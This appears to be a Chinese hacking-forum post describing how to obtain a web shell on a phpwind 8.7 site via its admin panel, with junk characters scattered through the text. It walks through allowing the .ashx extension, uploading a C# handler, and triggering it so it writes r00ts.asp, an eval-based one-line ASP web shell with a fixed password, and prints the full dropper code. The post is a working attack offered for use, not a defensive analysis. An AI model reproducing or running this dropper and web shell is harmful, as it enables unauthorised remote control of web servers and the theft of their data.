phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
8 D7 k$ ^8 w! Y+ G, U
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

; R& e- S8 {. s3 w6 A' b4 _0 A' ]然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

7 E& |3 Q0 k7 @4 P% M打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

) |+ j& U% O: f- U4 l- y下面是代码:

* Q/ {; `* R+ x( t. G8 c4 `<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
9 z8 k7 s4 Z; [using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
! L8 |4 f) r( [5 B$ Z2 t" nStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
5 N. r! _( S2 Q( h* T  Cfile1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
file1.Close();
+ h( w: c$ R+ S. `% r+ f}
, P' p; f* Q' ^- ]+ [public bool IsReusable {
get {
return false;
}
}
}